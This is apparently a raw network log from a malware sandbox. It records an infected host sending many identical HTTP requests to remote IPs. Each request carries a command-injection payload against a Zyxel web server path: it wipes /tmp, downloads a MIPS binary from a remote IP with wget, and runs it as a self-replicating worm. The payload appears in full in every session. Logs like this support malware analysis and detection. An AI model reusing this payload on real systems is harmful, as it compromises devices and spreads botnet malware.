                        Mar 12, 2024 08:50:24.997164011 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        326192.168.2.1459770134.16.50.24443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.997211933 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        327192.168.2.1450614112.227.125.20443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.997251987 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        328192.168.2.1442780174.11.41.104443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.997293949 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        329192.168.2.1446684113.233.71.41443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.997306108 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        330192.168.2.1435068209.55.219.121443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.997335911 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        331192.168.2.143494265.58.64.43443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.997422934 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        332192.168.2.143327498.56.178.12443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.997505903 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        333192.168.2.144034053.217.166.133443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.997554064 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        334192.168.2.14367564.19.148.52443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.997584105 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        335192.168.2.144669062.252.11.64443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.997641087 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        336192.168.2.1452506144.239.242.12443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.997661114 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        337192.168.2.14359704.54.223.179443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.997704983 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        338192.168.2.1444278119.79.255.18443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.997741938 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        339192.168.2.14381525.202.94.37443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.997797966 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        340192.168.2.1445842129.166.249.38443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.997824907 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        341192.168.2.1434256110.136.33.99443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.997867107 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        342192.168.2.143427861.1.64.23443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.997920990 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        343192.168.2.145062446.182.218.43443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.997965097 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        344192.168.2.1439062155.17.249.42443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.998027086 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        345192.168.2.1439172132.28.136.242443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.998056889 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        346192.168.2.1452614181.219.131.54443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.998116970 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        347192.168.2.1444950153.10.8.207443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.998159885 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        348192.168.2.1457204164.144.123.132443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.998229027 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        349192.168.2.1454374156.116.75.124443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.998303890 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        350192.168.2.143567896.112.140.192443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.998337030 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        351192.168.2.1439074193.163.41.124443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.998377085 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        352192.168.2.1436878103.75.186.158443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.998418093 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        353192.168.2.145281878.227.246.140443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.998482943 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        354192.168.2.1439242202.134.92.92443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.998583078 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        355192.168.2.144543286.56.252.5443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.998631001 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        356192.168.2.144040493.183.247.204443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.998683929 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        357192.168.2.145128213.237.83.168443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.998711109 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        358192.168.2.1435498180.54.124.52443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.998753071 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        359192.168.2.1448304135.111.74.104443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.998804092 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        360192.168.2.1440662190.103.11.169443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.998855114 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        361192.168.2.1453888146.139.200.197443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.998888016 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        362192.168.2.1451526150.173.7.220443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.998912096 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        363192.168.2.1451922153.136.243.36443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.998965025 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        364192.168.2.1453090112.82.211.217443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.999025106 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        365192.168.2.1442238153.53.135.60443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.999068975 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        366192.168.2.1449032113.248.169.138443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.999089003 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        367192.168.2.1453332192.22.169.197443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.999133110 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        368192.168.2.144835425.238.54.85443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.999190092 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        369192.168.2.1440676168.247.118.169443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.999226093 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        370192.168.2.1460462167.12.16.38443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.999280930 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        371192.168.2.1447260203.169.1.97443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.999311924 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        372192.168.2.145673897.209.248.41443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.999377966 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        373192.168.2.145337264.114.231.51443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.999406099 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        374192.168.2.1450396187.230.3.133443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.999455929 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        375192.168.2.145589644.99.186.243443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.999494076 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        376192.168.2.145896419.173.169.145443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.999562025 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        377192.168.2.1434896154.144.114.137443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.999624968 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        378192.168.2.1433760149.100.85.187443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.999670982 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        379192.168.2.143572685.144.32.155443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.999742985 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        380192.168.2.1455290173.27.54.186443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.999778032 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        381192.168.2.1446576179.140.30.9443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.999818087 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        382192.168.2.1451944173.72.198.71443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.999825954 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        383192.168.2.14456322.37.238.81443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.999871969 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        384192.168.2.1441942181.242.118.232443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.999903917 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        385192.168.2.1453958217.161.13.253443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.999959946 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        386192.168.2.1445624210.177.217.100443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:24.999988079 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        387192.168.2.1443764184.58.15.245443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.000034094 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        388192.168.2.1433726157.196.219.62443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.000056028 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        389192.168.2.145426846.121.87.244443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.000113010 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        390192.168.2.1445364152.238.242.213443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.000133038 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        391192.168.2.144954480.85.183.179443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.000173092 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        392192.168.2.1460726110.165.161.126443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.000190973 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        393192.168.2.145893025.248.108.254443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.000271082 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        394192.168.2.144995840.32.122.237443
                        TimestampBytes transferredDirectionData
                        Mar 12, 2024 08:50:25.000307083 CET179OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.154.3.56/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                        Session IDSource IPSource PortDestination IPDestination Port
                        395192.168.2.145136031.122.231.19443
                        TimestampBytes transferredDirectionData
